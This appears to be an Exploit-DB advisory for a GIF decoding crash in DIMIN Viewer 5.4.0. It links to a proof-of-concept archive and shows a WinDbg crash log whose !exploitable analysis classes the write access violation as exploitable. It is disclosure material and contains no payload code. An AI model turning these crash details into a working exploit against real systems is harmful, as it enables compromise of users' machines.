DIMIN Viewer 5.4.0 – GIF Decode Crash (PoC)

  • Author: Lizhi Wang
    Date: 2012-12-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/23496/
  • PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23496.tar.gz
    
    CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe"
    Symbol search path is: *** Invalid ***
    ****************************************************************************
    * Symbol loading may be unreliable without a symbol search path. *
    * Use .symfix to have the debugger choose a symbol path. *
    * After setting your symbol path, use .reload to refresh symbol locations. *
    ****************************************************************************
    Executable search path is:
    (ed4.988): Break instruction exception - code 80000003 (first chance)
    eax=00251eb4 ebx=7ffdb000 ecx=00000000 edx=00000001 esi=00251f48 edi=00251eb4
    eip=7c901230 esp=0012fb20 ebp=0012fc94 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
    ntdll!DbgBreakPoint:
    7c901230 cc              int     3
    0:000> g
    (ed4.988): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=0000001c ecx=0012f108 edx=00130000 esi=00000483 edi=0041b0c4
    eip=0059b5a4 esp=0011ef50 ebp=0011ef88 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    *** WARNING: Unable to verify checksum for image00400000
    *** ERROR: Module load completed but symbols could not be loaded for image00400000
    image00400000+0x19b5a4:
    0059b5a4 8902            mov     dword ptr [edx],eax  ds:0023:00130000=78746341
    0:000> !load MSEC.dll
    0:000> !exploitable -v
    HostMachine\HostUser
    Executing Processor Architecture is x86
    Debuggee is in User Mode
    Debuggee is a live user mode debugging session on the local machine
    Event Type: Exception
    Exception Faulting Address: 0x130000
    First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
    Exception Sub-Type: Write Access Violation
    
    Exception Hash (Major/Minor): 0x6f00020e.0x4621230e
    
    Stack Trace:
    image00400000+0x19b5a4
    image00400000+0x19b73d
    image00400000+0x19b9b3
    Instruction Address: 0x000000000059b5a4
    
    Description: User Mode Write AV
    Short Description: WriteAV
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - User Mode Write AV starting at image00400000+0x000000000019b5a4 (Hash=0x6f00020e.0x4621230e)
    
    User mode write access violations that are not near NULL are exploitable.